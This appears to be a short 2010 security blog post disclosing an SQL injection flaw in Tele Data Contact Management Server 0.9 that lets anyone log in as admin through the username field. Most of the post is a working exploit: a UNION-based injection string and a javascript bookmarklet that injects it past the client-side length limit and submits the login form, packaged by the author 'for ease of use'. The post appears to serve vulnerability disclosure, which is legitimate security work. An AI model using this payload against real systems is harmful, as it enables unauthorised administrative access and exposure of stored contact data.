This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, April 28, 2010

Tele Data Contact Management Server 0.9 SQL Injection

Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.

Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

4 comments: